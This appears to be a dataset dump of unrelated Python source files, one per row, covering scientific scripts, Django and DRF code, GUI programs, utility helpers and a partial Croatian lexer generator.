text stringlengths 38 1.54M |
|---|
#!/usr/bin/env python3
import re, sys, os, shutil
from subprocess import call
def isValidRegion(region):
return len(filter(lambda x: len(x) > 0, re.split('[:-]', region))) == 3
def read_frag(frag):
chrom, start, end = filter(lambda x: len(x) > 0, re.split('[:-]', frag))
strandiness = '-' if frag[0] == '-' else '+'
return {'dir': strandiness,
'chr': chrom,
'start': start,
'end': end}
def is_in_region(region, frag):
d = region['dir']
start = region['start']
end = region['end']
chrom = region['chr']
if frag['chr'] == chrom and frag['dir'] == d:
if frag['start'] >= start and frag['end'] <= end:
return True
elif frag['start'] < start and frag['end'] > end:
return True
def is_in_any_region(regions, el):
def touples(regs, fs):
for r in regs:
for f in fs:
yield (r,f)
plotfile, frags, chroms = el.split('\t')
frags = map(read_frag, frags[1:-1].split(','))
return reduce(lambda x,y: x or y, [is_in_region(r,f) for r,f in touples(regions, frags)])
def matching_files(filename, regions):
region_maps = map(read_frag, regions)
with open(filename, 'r') as inFile:
matches = filter(lambda x: is_in_any_region(region_maps, x), inFile)
return map(lambda x: x.split('\t')[0], matches)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: %s region [region region ...] [--multistrand|--circular,--copy]')
print('\n--multitrand or --circular will only look for respective events')
print('--copy copy findings to subfolder "myfindings/"')
print('--viz create plots with GraphViz')
exit(1)
regions = filter(lambda x: x[:2] != '--', sys.argv[1:])
flags = filter(lambda x: x[:2] == '--', sys.argv[1:])
if '--circular' in flags and '--multistrand' in flags:
flags = filter(lambda x: x != '--circular' and x != '--multistrand', flags)
if not reduce(lambda x,y: x and y, map(isValidRegion, regions)):
print('Error: Invalid region definitions.')
print('Required: [+/-][chromosome-name]:[start-position]-[end-position]')
print(' -X:100-21313')
exit(-1)
results = matching_files('pressspan.log', regions)
if '--circular' in flags:
results = filter(lambda x: x.startswith('circ'), results)
elif '--multistrand' in flags:
results = filter(lambda x: x.startswith('mult'), results)
print("Found %d results matching your criteria" % (len(results)))
if '--copy' in flags and len(results) > 0:
result_dir = 'myfindings'
print('Creating folder %s and copying files...' % (result_dir))
if not os.path.exists(result_dir):
os.makedirs(result_dir)
for rfile in results:
rfile += '.dot'
prefix = 'circulars/' if rfile.startswith('circ') else 'multis/'
try:
shutil.copyfile(prefix + rfile, result_dir + '/' + rfile)
except IOError:
print('ERROR: Could not copy file %s%s' %(prefix, rfile))
if '--viz' in flags:
result_dir = 'mygraphs'
if not os.path.exists(result_dir):
os.makedirs(result_dir)
for rfile in results:
prefix = 'circulars/' if rfile.startswith('circ') else 'multis/'
try:
call(['dot', '-Teps',
prefix + rfile + '.dot',
'-o', result_dir + '/' + rfile + '.eps'])
except:
print('ERROR: Could not complete call to dot. Is GraphViz installed?')
|
import os
if "PYCTDEV_ECOSYSTEM" not in os.environ:
os.environ["PYCTDEV_ECOSYSTEM"] = "conda"
from pyctdev import * # noqa: api
def task_pip_on_conda():
"""Experimental: provide pip build env via conda"""
return {'actions':[
# some ecosystem=pip build tools must be installed with conda when using conda...
'conda install -y pip twine wheel "rfc3986>=1.4.0"',
# ..and some are only available via conda-forge
'conda install -y -c conda-forge tox "virtualenv<=20.4.7"',
]}
def _build_dev(channel):
channels = " ".join(['-c %s' % c for c in channel])
return "conda build %s conda.recipe/ --build-only" % channels
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-11-03 04:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0006_auto_20171103_0219'),
]
operations = [
migrations.CreateModel(
name='PHHistory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tank_id', models.IntegerField()),
('modified_date', models.DateTimeField(auto_now=True)),
('ph', models.DecimalField(decimal_places=2, max_digits=5)),
],
),
migrations.AlterField(
model_name='tank',
name='ammonia_max',
field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
),
migrations.AlterField(
model_name='tank',
name='ammonia_min',
field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
),
migrations.AlterField(
model_name='tank',
name='last_ammonia',
field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
),
migrations.AlterField(
model_name='tank',
name='last_ph',
field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
),
migrations.AlterField(
model_name='tank',
name='ph_max',
field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
),
migrations.AlterField(
model_name='tank',
name='ph_min',
field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
),
migrations.AlterField(
model_name='temphistory',
name='temperature',
field=models.DecimalField(decimal_places=2, max_digits=5),
),
]
|
"""
Cruise Analysis
Call CruiseAnalysis(V_Cruise,W,S,rh0,CLa,CL0) to obtain Cruise CL,and the
required alpha given motocalc and AVL/XFLR5 lift slope info.
"""
import numpy as np
from matplotlib import pyplot as plt
from scipy.interpolate import UnivariateSpline
from scipy.optimize import fsolve
rho = 1.225
#alpha given in deg.
V = [0.00,2.00,4.00,6.00,8.00,10.0,12.0,14.0,15.0,16.0]
T = [6.50,6.25,6.00,5.75,5.50,5.20,4.80,4.40,4.20,3.8]
#Interpolate the thrust curve:
V_interp = np.arange(0,16.0,0.1) #Arbitrarily set.
T_interp = np.interp(V_interp,V,T)
T_spline = UnivariateSpline(V,T)
# 10x5
V_10x5 = [0, 2, 4, 6, 8, 10, 12, 14, 15.0,15.5]
T_10x5 = [8.2, 7.8, 7.4, 6.95,6.3, 5.55,4.6, 3.6,2.95,2.65]
T_interp = np.interp(V_interp,V_10x5,T_10x5)
T_spline = UnivariateSpline(V_10x5,T_10x5)
def get_thrust_available(v):
return T_spline(v)
class CruiseSolver():
"""
Used to solve for cruise alpha, velocity.
"""
def __init__(self, M, S, b, cl0, cla, cd0=0.04, e=0.8):
self.W = M*9.81
self.b = b
self.S = S
self.cl0 = cl0
self.cla = cla
self.cd0 = cd0
self.e = e
self.AR = b**2/S
self.K = 1/(self.AR*self.e*np.pi)
def get_cruise_alpha(self, v):
return (2*self.W/(rho*v**2*self.S) - self.cl0)/self.cla
def get_cruise_v(self, alpha):
return np.sqrt((2*self.W)/(rho*self.S*(self.cl0 + alpha*self.cla)))
def compute_drag(self, alpha, v):
return (self.cd0 + self.K*(self.cl0 + alpha*self.cla)**2)*\
0.5*rho*v**2*self.S
def thrust_differential(self, alpha):
v = self.get_cruise_v(alpha)
D = self.compute_drag(alpha, v)
T = get_thrust_available(v)
return T - D
def solve_cruise_alpha(self):
alpha = fsolve(self.thrust_differential, 0.2)
v = self.get_cruise_v(alpha)
return alpha, v[0]
def cruise_residual(m, v_cruise, s_ref, cl0, cla, alpha):
return 9.81*m - 0.5*1.225*v_cruise**2*s_ref*(cl0 + cla*alpha)
def alpha_cruise(V_Cruise,W,S,CLa,CL0):
#V_Cruise = 15.5; #m/s (from motoCalc)
#W = 2*9.8; #kg
#S = 0.62; #m**2
#rh0 = 1.225;
#Using input arguments we calcuate
#the required CL for steady level flight.
CL=CL_Cruise(W,S,V_Cruise)
alphaCruise = CruiseAlpha(CL0,CLa,CL) #in degrees
return (CL,alphaCruise)
def CL_Cruise(W,S,V_Cruise):
CL = 2*W/(S*rho*V_Cruise**2)
return CL
def CruiseAlpha(CL0,CLa,CL):
alpha = (CL-CL0)/CLa
return alpha
def maxSpeedWithThrust(CD0,b,S,CLa,CL0,alpha,e=0.8):
#Calculate aspect ratio
AR = b**2/S
K = 1/(np.pi*e*AR)
#Generate D curve
V = V_interp
# Had *np.pi/180 below... probably wrong
D = (CD0 + K*(CL0 + CLa*alpha)**2)*S*0.5*rho*V**2
# plt.figure()
# plt.plot(V_interp, D, 'b*')
# plt.grid()
# plt.plot(V_interp, T_interp, 'r--')
# plt.legend(('Drag', 'Thrust Available'))
# plt.xlabel('V (m/s)')
# plt.ylabel('Force (N)')
#Find the index of where delta is minimized:
delta = abs(T_interp - D)
V_index = np.argmin(delta)
T_res = D[V_index] - T_interp[V_index]
#Determine V at the index of minimum delta:
Vmax = V_interp[V_index]
return Vmax, T_res
if __name__ == '__main__':
CD0 = 0.04
b = 1.2333
S = 0.519
#CLa = 0.0524*180/np.pi
CLa = 0.04965
CL0 = 0.0483
alpha = 3.6
print maxSpeedWithThrust(CD0,b,S,CLa,CL0,alpha)
V_Cruise = 14.9 #m/s (from motoCalc)
W = 1.622*9.8 #kg
S = 0.5193 #m**2
rh0 = 1.225
rho = 1.225
CLa = 3.2659
CL0 = -0.02
CL_Cruise,alphaCruise = alpha_cruise(V_Cruise,W,S,CLa,CL0)
print CL_Cruise, alphaCruise |
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 28 09:52:01 2020
@author: Joash
"""
import numpy as np
from os import listdir
import knn as K
def img2vector(filename):
returnVect = np.zeros((1,1024))
fr = open(filename)
for i in range(32):
lineStr = fr.readline()
for j in range(32):
returnVect[0,32*i+j] = int(lineStr[j])
return returnVect
hwLabels = []
trainingFileList = listdir('trainingDigits') #读取文件夹里的文件名,一维数组
m = len(trainingFileList)
trainingMat = np.zeros((m,1024))
for i in range(m):
fileNameStr = trainingFileList[i] #提取文件名
fileStr = fileNameStr.split('.')[0]
classNumStr = int(fileStr.split('_')[0])
hwLabels.append(classNumStr)
trainingMat[i,:] = img2vector('trainingDigits/%s' % fileNameStr)
testFileList = listdir('testDigits')
errorCount = 0.0
numTest = len(testFileList)
for i in range(numTest):
fileNameStr = testFileList[i]
fileStr = fileNameStr.split('.')[0]
classNumStr = int(fileStr.split('_')[0])
vectorUnderTest = img2vector('testDigits/%s' % fileNameStr) #读取测试数据
classifierResult = K.knn(vectorUnderTest,trainingMat,hwLabels,3) #调用KNN算法,进行分类
print("KNN得到的辨识结果是:%d,实际值是:%d" % (classifierResult,classNumStr))
if (classifierResult != classNumStr):
errorCount += 1.0
print("\n辨识错误数量为:%d" % errorCount)
print("\n辨识率为:%f %%" %((1-errorCount/float(numTest))*100)) #用%%代替%
#print("\n辨识率为: %f %" % ((1-errorCount/float(numTest))*100))#参考代码 |
from newsfeed_member import models
from rest_framework import serializers
from member import serializers as member_serializers
class NewsfeedType(serializers.ModelSerializer):
# pylint: disable=too-few-public-methods
class Meta(object):
# pylint: disable=too-few-public-methods
model = models.NewsfeedType
fields = ('id', 'name', 'description', 'updated', 'created')
class Newsfeed(serializers.ModelSerializer):
# pylint: disable=too-few-public-methods
event_type = serializers.SlugRelatedField(
source='event_type',
slug_field='name',
read_only=True)
member = member_serializers.Member(source='member') # noqa # pylint: disable=no-value-for-parameter, unexpected-keyword-arg
club_id = serializers.Field(source='club.id')
status_update_id = serializers.Field(source='status_update.id')
subject_member = member_serializers.Member(source='subject_member') # noqa # pylint: disable=no-value-for-parameter, unexpected-keyword-arg
class Meta(object):
# pylint: disable=too-few-public-methods
model = models.Newsfeed
fields = ('id', 'member', 'club_id', 'event_type', 'status_update_id',
'subject_member', 'time')
|
from car import Car
from controller import Controller
def map_from_to(x, a, b, c, d):
return (x - a) / (b - a) * (d - c) + c
class CarController(Controller):
def __init__(self, **kwargs):
Controller.__init__(self, **kwargs)
self.car = Car(controller_connected=self.is_connected)
self.min_value = -32767
self.max_value = 32767
# R1 for limiter
def on_R1_press(self):
self.car.limiter = self.car.speed
self.car.regulator.clear()
# L1 for regulator
def on_L1_press(self):
if self.car.regulator.is_set():
self.car.regulator.clear()
else:
self.car.regulator.set()
self.car.limiter = -1
# R2 for throttle
def on_R2_press(self, value):
if not self.car.regulator.is_set():
self.car.speed = map_from_to(value, self.min_value, self.max_value, 0.2, 1)
self.car.throttle(self.car.speed if self.car.limiter == -1 else min(self.car.speed, self.car.limiter))
def on_R2_release(self):
self.car.stop()
# L2 for reverse
def on_L2_press(self, value):
self.car.reverse(map_from_to(value, self.min_value, self.max_value, 0.2, 1))
def on_L2_release(self):
self.car.stop()
# R3 for steering
def on_R3_x_at_rest(self):
self.car.steer(0)
def on_R3_left(self, value):
self.car.steer(map_from_to(value, 0, self.min_value, 0, self.car.steering_servo.min_angle))
def on_R3_right(self, value):
self.car.steer(map_from_to(value, 0, self.max_value, 0, self.car.steering_servo.max_angle))
|
import wx
import os
from typing import List, Dict, Callable, Union, Tuple, Any, Type, TYPE_CHECKING
import importlib
import pkgutil
import traceback
from amulet.api.errors import LoaderNoneMatched
from amulet import world_interface
from amulet_map_editor import log
from amulet_map_editor.amulet_wx.ui.simple import SimplePanel
from amulet_map_editor.amulet_wx.ui.select_world import WorldUI
if TYPE_CHECKING:
from amulet.api.world import World
MenuData = Dict[
str, Dict[
str, Dict[
str, Union[
Callable,
Tuple[Callable],
Tuple[Callable, str],
Tuple[Callable, str, Any],
]
]
]
]
# this is where most of the magic will happen
_extensions: List[Tuple[str, Type['BaseWorldProgram']]] = []
_fixed_extensions: List[Tuple[str, Type['BaseWorldProgram']]] = []
def load_extensions():
if not _extensions:
_extensions.extend(_fixed_extensions)
for _, name, _ in pkgutil.iter_modules([os.path.join(os.path.dirname(__file__))]):
# load module and confirm that all required attributes are defined
module = importlib.import_module(f'amulet_map_editor.programs.{name}')
if hasattr(module, 'export'):
export = getattr(module, 'export')
if 'ui' in export and issubclass(export['ui'], BaseWorldProgram) and issubclass(export['ui'], wx.Window):
_extensions.append((export.get('name', 'missingno'), export['ui']))
class BaseWorldUI:
def disable(self):
pass
def enable(self):
pass
def close(self):
pass
def menu(self, menu: MenuData) -> MenuData:
return menu
class WorldManagerUI(wx.Notebook, BaseWorldUI):
def __init__(self, parent: wx.Window, path: str, close_self_callback: Callable[[], None]):
super().__init__(parent, style=wx.NB_LEFT)
self._path = path
self._close_self_callback = close_self_callback
try:
self.world = world_interface.load_world(path)
except LoaderNoneMatched as e:
self.Destroy()
raise e
self.world_name = self.world.world_wrapper.world_name
self._extensions: List[BaseWorldProgram] = []
self._last_extension: int = -1
self._load_extensions()
self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self._page_change)
@property
def path(self) -> str:
return self._path
def menu(self, menu: MenuData) -> MenuData:
menu.setdefault('&File', {}).setdefault('exit', {}).setdefault('Close World', lambda evt: self._close_self_callback)
return self._extensions[self.GetSelection()].menu(menu)
def _load_extensions(self):
"""Load and create instances of each of the extensions"""
load_extensions()
select = True
for extension_name, extension in _extensions:
try:
ext = extension(self, self.world, self._close_self_callback)
self._extensions.append(ext)
self.AddPage(ext, extension_name, select)
select = False
except Exception as e:
log.exception(f'Failed to load extension {extension_name}\n{e}\n{traceback.format_exc()}')
continue
def is_closeable(self) -> bool:
"""Check if all extensions are safe to be closed"""
return all(e.is_closeable() for e in self._extensions)
def close(self):
"""Close the world and destroy the UI
Check is_closeable before running this"""
for ext in self._extensions:
ext.close()
self.world.close()
def _page_change(self, evt):
"""Method to fire when the page is changed"""
if self.GetSelection() != self._last_extension:
self._extensions[self._last_extension].disable()
self._extensions[self.GetSelection()].enable()
self.GetGrandParent().create_menu()
self._last_extension = self.GetSelection()
def disable(self):
self._extensions[self.GetSelection()].disable()
def enable(self):
self._extensions[self.GetSelection()].enable()
self.GetGrandParent().create_menu()
class BaseWorldProgram:
def enable(self):
"""Run when the panel is shown/enabled"""
pass
def disable(self):
"""Run when the panel is hidden/disabled"""
pass
def is_closeable(self) -> bool:
"""
Check if it is safe to close the UI.
If this is going to return False it should notify the user.
:return: True if the program can be closed, False otherwise
"""
return True
def close(self):
"""Fully close the UI. Called when destroying the UI."""
pass
def menu(self, menu: MenuData) -> MenuData:
return menu
class AboutExtension(SimplePanel, BaseWorldProgram):
def __init__(self, container, world: 'World', close_self_callback: Callable[[], None]):
SimplePanel.__init__(
self,
container
)
self.world = world
self._close_self_callback = close_self_callback
self._close_world_button = wx.Button(self, wx.ID_ANY, label='Close World')
self._close_world_button.Bind(wx.EVT_BUTTON, self._close_world)
self.add_object(self._close_world_button, 0, wx.ALL | wx.CENTER)
self.add_object(
wx.StaticText(
self,
label='Currently Opened World: '
), 0, wx.ALL | wx.CENTER
)
self.add_object(
WorldUI(self, self.world.world_wrapper), 0, wx.ALL | wx.CENTER
)
self.add_object(
wx.StaticText(
self,
label='Choose from the options on the left what you would like to do.\n'
'You can switch between these at any time.\n'
'<================='
), 0, wx.ALL | wx.CENTER
)
def _close_world(self, evt):
self._close_self_callback()
_fixed_extensions.append(("About", AboutExtension))
|
import os
import sys
import time
import numpy as np
import scipy as sp
import h5py as h5
from mpi4py import MPI # module required to use MPI
import argparse
import skopi as sk
from skopi.util import asnumpy, xp
# set up MPI environment
comm = MPI.COMM_WORLD # communication module
size = comm.Get_size() # number of processors available
rank = comm.Get_rank() # the rank of the process (the rank of a process always ranges from 0 to size-1)
def main():
# parse user input
params = parse_input_arguments(sys.argv)
pdb = params['pdb']
geom = params['geom']
beam = params['beam']
numParticles = int(params['numParticles'])
numPatterns = int(params['numPatterns'])
outDir = params['outDir']
saveName = params['saveNameHDF5']
data = None
if rank == 0:
print ("====================================================================")
print ("Running %d parallel MPI processes" % size)
t_start = MPI.Wtime()
# load beam
beam = sk.Beam(beam)
# load and initialize the detector
det = sk.PnccdDetector(geom=geom, beam=beam)
# create particle object(s)
particle = sk.Particle()
particle.read_pdb(pdb, ff='WK')
experiment = sk.SPIExperiment(det, beam, particle)
f = h5.File(os.path.join(outDir,"sim_data.h5"),"w")
f.attrs['numParticles'] = numParticles
experiment.volumes[0] = xp.asarray(experiment.volumes[0])
experiment.volumes[0] = xp.asarray(experiment.volumes[0])
dset_volume = f.create_dataset("volume", data=experiment.volumes[0], compression="gzip", compression_opts=4)
data = {"detector": det, "beam": beam, "particle": particle}
print ("Broadcasting input to processes...")
dct = comm.bcast(data,root=0)
if rank == 0:
pattern_shape = det.pedestals.shape # (4, 512, 512)
dset_intensities = f.create_dataset("intensities", shape=(numPatterns,)+pattern_shape, dtype=np.float32, chunks=(1,)+pattern_shape, compression="gzip", compression_opts=4) # (numPatterns, 4, 512, 512)
dset_photons = f.create_dataset("photons", shape=(numPatterns,)+pattern_shape, dtype=np.float32, chunks=(1,)+pattern_shape, compression="gzip", compression_opts=4)
dset_positions = f.create_dataset("positions", shape=(numPatterns,)+(numParticles, 3), dtype=np.float32, chunks=(1,)+(numParticles, 3), compression="gzip", compression_opts=4)
dset_orientations = f.create_dataset("orientations", shape=(numPatterns,)+(numParticles, 4), chunks=(1,)+(numParticles, 4), compression="gzip", compression_opts=4)
dset_pixel_index_map = f.create_dataset("pixel_index_map", data=det.pixel_index_map, compression="gzip", compression_opts=4)
dset_pixel_position_reciprocal = f.create_dataset("pixel_position_reciprocal", data=det.pixel_position_reciprocal, compression="gzip", compression_opts=4)
print ("Done creating HDF5 file and dataset...")
n = 0
while n < numPatterns:
status1 = MPI.Status()
(ind, img_slice_intensities, img_slice_positions, img_slice_orientations) = comm.recv(source=MPI.ANY_SOURCE,status=status1)
i = status1.Get_source()
print ("Rank 0: Received image %d from rank %d" % (ind,i))
dset_intensities[ind,:,:,:] = np.asarray(img_slice_intensities)
dset_photons[ind,:,:,:] = det.add_quantization(img_slice_intensities)
dset_positions[ind,:,:] = np.asarray(img_slice_positions)
dset_orientations[ind,:,:] = np.asarray(img_slice_orientations)
n += 1
else:
det = dct['detector']
beam = dct['beam']
particle = dct['particle']
experiment = sk.SPIExperiment(det, beam, particle)
for i in range((rank-1),numPatterns,size-1):
img_slice = experiment.generate_image_stack(return_intensities=True, return_positions=True, return_orientations=True, always_tuple=True)
img_slice_intensities = img_slice[0]
img_slice_positions = img_slice[1]
img_slice_orientations = img_slice[2]
comm.ssend((i,img_slice_intensities,img_slice_positions,img_slice_orientations),dest=0)
if rank == 0:
t_end = MPI.Wtime()
print ("Finishing constructing %d patterns in %f seconds" % (numPatterns,t_end-t_start))
f.close()
sys.exit()
def parse_input_arguments(args):
del args[0]
parse = argparse.ArgumentParser()
parse.add_argument('-p', '--pdb', type=str, help='PDB file')
parse.add_argument('-g', '--geom', type=str, help='psana geometry file')
parse.add_argument('-b', '--beam', type=str, help='beam file defining X-ray beam')
parse.add_argument('-m', '--numParticles', type=int, help='number of particles')
parse.add_argument('-n', '--numPatterns', type=int, help='number of diffraction patterns')
parse.add_argument('-o', '--outDir', default='', type=str, help='output directory')
parse.add_argument('-s', '--saveNameHDF5',default='saveHDF5_parallel.h5',type=str, help='filename for image dataset')
# convert argparse to dict
return vars(parse.parse_args(args))
if __name__ == '__main__':
main()
|
import sys, random
from PyQt4 import QtGui, QtCore
# Robot Widget
class RobotLink(QtGui.QWidget):
def __init__(self, parent, x, y, width, height, fill):
super(RobotLink, self).__init__(parent)
self._fill = fill
self._rotation = 0
self.setGeometry(x, y, width, height)
def paintEvent(self, e):
painter = QtGui.QPainter()
painter.begin(self)
self.drawLink(painter)
painter.end()
def drawLink(self, painter):
painter.setPen(QtGui.QColor(0, 0, 0))
painter.setBrush(self._fill)
painter.drawEllipse(0, 0, self.width(), self.height())
# Window
class Window(QtGui.QWidget):
# Default Constructor, sets up the window GUI
def __init__(self):
super(Window, self).__init__()
self.initUI()
def initUI(self):
self._link1 = RobotLink(self, 10, 10, 100, 50, QtCore.Qt.DiagCrossPattern)
self._link2 = RobotLink(self, 100, 100, 50, 100, QtCore.Qt.Dense5Pattern)
self._link3 = RobotLink(self, 150, 150, 50, 50, QtCore.Qt.Dense2Pattern)
self.setGeometry(300, 300, 800, 600)
self.setWindowTitle("CSCE 452 - PaintBot")
def paintEvent(self, e):
super(Window, self).paintEvent(e)
painter = QtGui.QPainter()
painter.begin(self)
self.drawBoundingBoxes(painter)
painter.end()
# Draws the boxes that define the robots workspace and
# the control panel
def drawBoundingBoxes(self, painter):
color = QtGui.QColor(0, 0, 0)
color.setNamedColor("#cccccc")
painter.setPen(color)
# Draw the robot workspace
painter.setBrush(QtGui.QColor(255, 255, 255))
painter.drawRect(10, 10, 500, 578)
# Draw the control panel workspace
painter.setBrush(QtGui.QColor(150, 150, 150))
painter.drawRect(520, 10, 270, 578)
# Draws the slider 'base'
painter.setPen(QtGui.QColor(0, 0, 0))
painter.drawLine(100, 570, 400, 570)
def changeValue(self, value):
self.wid.emit(QtCore.SIGNAL("updateRobot(int)"), value)
self.wid.repaint()
# Setup the Window, and the Robot
app = QtGui.QApplication(sys.argv)
win = Window()
win.show()
app.exec_()
|
import bitstring
from bitstring import BitArray
# to always make sure the address is in the right format
def complete_address(value):
length = len(value)
if length > 32 or length == 0:
return 'none'
elif length == 32:
return value
else:
limit = 32-length
value = str(value)
for x in range(0, limit):
value = ''.join(('0',value))
return value
# to transform the integer to binary string of 32 bits to be written in memory
def value_to_write(value):
if value == "none":
return -1
b = BitArray(int=value, length=32)
b = b.bin
return b
# transform binary string loaded from memory to int
def binary_to_int(value):
a = BitArray(bin= value)
a = a.int
return a
def binary_or_int_to_hex(value, type):
if type == BIN: #binary_to_hex
a = hex(int(value, 2))
return a
elif type == INT: #int_to_hex
a = hex(value)
return a
def hex_to_binary_or_int(value, type):
if type == INT:
a = int(value, 16)
return a
elif type == BIN:
a = bin(int('0xa', 16))
return a |
class Solution:
def matSearch(self,matrix, N, M, X):
row = len(matrix)-1
column = 0
while row >= 0 and column < len(matrix[0]):
if matrix[row][column] == X:
return 1
elif matrix[row][column] < X:
column += 1
elif matrix[row][column] >X:
row -= 1
return 0 |
""" [PPJ Projekt - 1. labos - Generator leksičkog analizatora]
@autori: najseksi PPJ ekipa + Dora Franjić
"""
import sys
class LeksickoPravilo:
def __init__(self):
self.stanje = ""
self.regex = ""
self.argumenti = []
def dodaj_argument(self, argument):
self.argumenti.append(argument)
def ispis(self):
string = self.stanje + " " + self.regex + " "
for argument in self.argumenti:
string += argument + " "
return string
class Automat:
def __init__(self, broj_stanja):
self.broj_stanja = broj_stanja
self.prihvatljiva_stanja = []
self.funkcije_prijelaza = dict()
def dodaj_epsilon_prijelaz(self, staro_stanje, novo_stanje):
self.dodaj_prijelaz(staro_stanje, novo_stanje, '')
return
def dodaj_prijelaz(self, staro_stanje, novo_stanje, prijelazni_znak):
if (staro_stanje, prijelazni_znak) not in self.funkcije_prijelaza:
self.funkcije_prijelaza[(staro_stanje, prijelazni_znak)] = [novo_stanje]
elif novo_stanje not in self.funkcije_prijelaza[(staro_stanje, prijelazni_znak)]:
self.funkcije_prijelaza[(staro_stanje, prijelazni_znak)].append(novo_stanje)
return
def novo_stanje(self):
self.broj_stanja += 1
return self.broj_stanja - 1
@staticmethod
def je_operator(izraz, i):
br = 0
while i - 1 >= 0 and izraz[i - 1] == "\\":
br += 1
i -= 1
return br % 2 == 0
"""
def nadji_odgovarajucu_zatvorenu_zagradu2(self, izraz):
for i in range(len(izraz)):
if izraz[i] == ")" and self.je_operator(izraz, i):
return i
"""
def nadji_odgovarajucu_zatvorenu_zagradu(self, izraz):
brojac_otvorenih_zagrada = 0
for i in range(len(izraz)):
if izraz[i] == ")" and self.je_operator(izraz, i):
if brojac_otvorenih_zagrada == 1:
return i
else:
brojac_otvorenih_zagrada -= 1
elif izraz[i] == "(" and self.je_operator(izraz, i):
brojac_otvorenih_zagrada += 1
def pretvori(self, izraz):
#print("izraz:", izraz)
izbori = []
br_zagrada = 0
zadnji = 0
for i in range(len(izraz)):
if izraz[i] == "(" and self.je_operator(izraz, i):
br_zagrada += 1
elif izraz[i] == ")" and self.je_operator(izraz, i):
br_zagrada -= 1
elif br_zagrada == 0 and izraz[i] == "|" and self.je_operator(izraz, i):
izbori += [izraz[zadnji: i]]
zadnji = i + 1
if izbori:
izbori += [izraz[zadnji: len(izraz)]]
lijevo_stanje = self.novo_stanje()
desno_stanje = self.novo_stanje()
if izbori:
for i in range(len(izbori)):
#print('prije i:', i)
privremeno = self.pretvori(izbori[i])
self.dodaj_epsilon_prijelaz(lijevo_stanje, privremeno[0])
#print(lijevo_stanje, privremeno[0], '$')
self.dodaj_epsilon_prijelaz(privremeno[1], desno_stanje)
#print(privremeno[1], desno_stanje, '$')
else:
prefiksirano = False
zadnje_stanje = lijevo_stanje
i = 0
while i < len(izraz):
#print('i:', i)
if prefiksirano:
prefiksirano = False
if izraz[i] == "t":
prijelazni_znak = "\t"
elif izraz[i] == "n":
prijelazni_znak = "\n"
elif izraz[i] == "_":
prijelazni_znak = " "
else:
prijelazni_znak = izraz[i]
a = self.novo_stanje()
b = self.novo_stanje()
self.dodaj_prijelaz(a, b, prijelazni_znak)
#print(a, b, prijelazni_znak)
else:
if izraz[i] == "\\":
prefiksirano = True
i += 1
continue
if izraz[i] != "(":
a = self.novo_stanje()
b = self.novo_stanje()
if izraz[i] == "":
self.dodaj_epsilon_prijelaz(a, b)
else:
self.dodaj_prijelaz(a, b, izraz[i])
#print(a, b, izraz[i])
else:
#print('srednji i:', i)
#print('izraz[i:]', izraz[i:])
j = self.nadji_odgovarajucu_zatvorenu_zagradu(izraz[i:]) + i
#print("j prije:", j)
privremeno = self.pretvori(izraz[i + 1: j])
a = privremeno[0]
b = privremeno[1]
i = j
#print("izraz cijeli:", izraz)
#print("izraz od poz. i:", izraz[i + 1:])
#print("j:", j)
#print("zadnji i:", i)
if (i + 1) < len(izraz) and izraz[i + 1] == "*":
x = a
y = b
a = self.novo_stanje()
b = self.novo_stanje()
self.dodaj_epsilon_prijelaz(a, x)
self.dodaj_epsilon_prijelaz(y, b)
self.dodaj_epsilon_prijelaz(a, b)
self.dodaj_epsilon_prijelaz(y, x)
i += 1
#print(zadnje_stanje, a)
self.dodaj_epsilon_prijelaz(zadnje_stanje, a)
#print(zadnje_stanje, a, '$') #a je krivi
zadnje_stanje = b
i += 1
self.dodaj_epsilon_prijelaz(zadnje_stanje, desno_stanje)
#print('asddsaads', zadnje_stanje, desno_stanje, '$')
return lijevo_stanje, desno_stanje
def ispis(self):
string = ""
for prijelaz in self.funkcije_prijelaza:
string += str(prijelaz[0]) + " " + str(prijelaz[1]) + " " + str(
self.funkcije_prijelaza.get(prijelaz)) + "\n"
return string
##################################################
""" [Globalne varijable] """
regularne_definicije = dict()
lista_stanja = list()
lista_uniformnih_znakova = list()
lista_leksickih_pravila = list()
glavni_automat = Automat(0)
lista_malih_automata = list()
""" [Metode za parsiranje ulaznih podataka]
- ucitaj_regularne_definicije(): parsira prvi dio ulazne datoteke
- ucitaj_stanja(): parsira drugi dio ulazne datoteke
- ucitaj_uniformne_znakove(): parsira treći dio ulazne datoteke
- ucitaj_leksicka_pravila(): parsira četvrti dio ulazne datoteke
"""
def ucitaj_podatke():
global lista_leksickih_pravila
ucitaj_regularne_definicije()
""" [Metoda koja učitava regularne definicije te pokreće učitavanje stanja] """
def ucitaj_regularne_definicije():
global regularne_definicije
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa[:2] == "%X":
ucitaj_stanja(linija_unosa)
return
regularna_definicija = linija_unosa.split(" ")
ime_regularne_definicije = regularna_definicija[0]
regularni_izraz = regularna_definicija[1]
regularne_definicije[ime_regularne_definicije] = regularni_izraz
ucitaj_regularne_definicije()
""" [Metoda koja učitava stanja te pokreće učitavanje uniformnih znakova] """
def ucitaj_stanja(linija_unosa):
global lista_stanja
lista_stanja = linija_unosa[3:].split(" ")
ucitaj_uniformne_znakove()
""" [Metoda koja učitava uniformne znakove te pokreće učitavanje leksičkih pravila] """
def ucitaj_uniformne_znakove():
global lista_uniformnih_znakova
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa[:2] == "%L":
lista_uniformnih_znakova = linija_unosa[3:].split(" ")
ucitaj_leksicka_pravila()
""" [Metoda koja učitava leksička pravila] """
def ucitaj_leksicka_pravila():
""" [Format leksickih pravila]
<stanje>regex
{
...argumenti svaki u svom retku...
}
"""
global lista_leksickih_pravila
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa == "":
return
leksicko_pravilo = LeksickoPravilo()
if linija_unosa[0] == "<":
indeks = linija_unosa.index(">")
leksicko_pravilo.stanje = linija_unosa[1: indeks]
